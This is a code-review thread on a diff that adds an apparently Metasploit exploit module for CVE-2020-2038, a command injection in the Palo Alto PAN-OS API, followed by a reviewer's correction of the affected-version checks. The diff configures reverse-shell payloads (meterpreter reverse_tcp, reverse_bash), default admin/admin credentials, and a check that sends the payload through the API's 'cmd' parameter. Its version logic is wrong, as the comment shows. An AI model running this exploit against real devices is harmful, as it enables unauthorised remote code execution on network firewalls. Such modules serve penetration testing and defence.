modules/exploits/linux/http/panos_op_cmd_exec.rb

```diff
@@ -0,0 +1,187 @@
+          This issue impacts PAN-OS versions < 10.0.1, < 9.1.4 and < 9.0.10
+        },
+        'Author' => [
+          'Mikhail Klyuchnikov', # Vulnerability discovery
+          'Nikita Abramov', # Vulnerability discovery
+          'UnD3sc0n0c1d0', # Exploit
+          'jheysel-r7' # msf module
+        ],
+        'References' => [
+          ['CVE', '2020-2038'],
+          ['URL', 'https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/'],
+          ['URL', 'https://security.paloaltonetworks.com/CVE-2020-2038'],
+          ['URL', 'https://github.com/und3sc0n0c1d0/CVE-2020-2038'] # Exploit
+        ],
+        'DisclosureDate' => '2020-09-09',
+        'License' => MSF_LICENSE,
+        'Platform' => 'linux',
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Linux ',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'CmdStagerFlavor' => %i[echo printf],
+              'Type' => :linux_dropper,
+              'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }
+            }
+          ],
+          [
+            'Unix In-Memory',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_memory,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION ]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('USERNAME', [false, 'PAN-OS administrator username', 'admin']),
+        OptString.new('PASSWORD', [false, 'Password for username', 'admin'])
+      ]
+    )
+  end
+
+  def check
+    print_status('Authenticating...')
+    begin
+      @api_key = api_key
+    rescue InvalidRequest, InvalidResponse => e
+      return Exploit::CheckCode::Safe.new("Error retrieving API key: #{e.class}, #{e}")
+    end
+    res = send_request_cgi({
+      'method' => 'GET',
+      'keep_cookies' => 'true',
+      'uri' => normalize_uri(target_uri.path, 'api/'),
+      'vars_get' => {
+        'cmd' => payload,
+        'type' => 'version',
+        'key' => @api_key
+      }
+    })
+
+    return CheckCode::Unknown.new('The API did not respond to the request for the version of PAN_OS') unless res&.body
+
+    version = Rex::Version.new(res.get_xml_document.xpath('/response/result/sw-version').text)
+
+    if version.between?(Rex::Version.new('9.0.0'), Rex::Version.new('9.0.10')) ||
+       version.between?(Rex::Version.new('9.1.4'), Rex::Version.new('9.1.4')) ||
+       version.eql?(Rex::Version.new('10.0.0'))
```

Comment:
According to the [advisory](https://security.paloaltonetworks.com/CVE-2020-2038), these versions looks wrong. I tested against PAN-OS 9.1.3 and I confirmed it is vulnerable.

Versions | Affected | Unaffected
-- | -- | --
PAN-OS 10.0 | < 10.0.1 | >= 10.0.1
PAN-OS 9.1 | < 9.1.4 | >= 9.1.4
PAN-OS 9.0 | < 9.0.10 | >= 9.0.10
PAN-OS 8.1 | None | 8.1.*

```suggestion
    if version >= Rex::Version.new('9.0.0') && version < Rex::Version.new('9.0.10') ||
       version >= Rex::Version.new('9.1.0') && version < Rex::Version.new('9.1.4') ||
       version >= Rex::Version.new('10.0.0') && version < Rex::Version.new('10.0.1')
```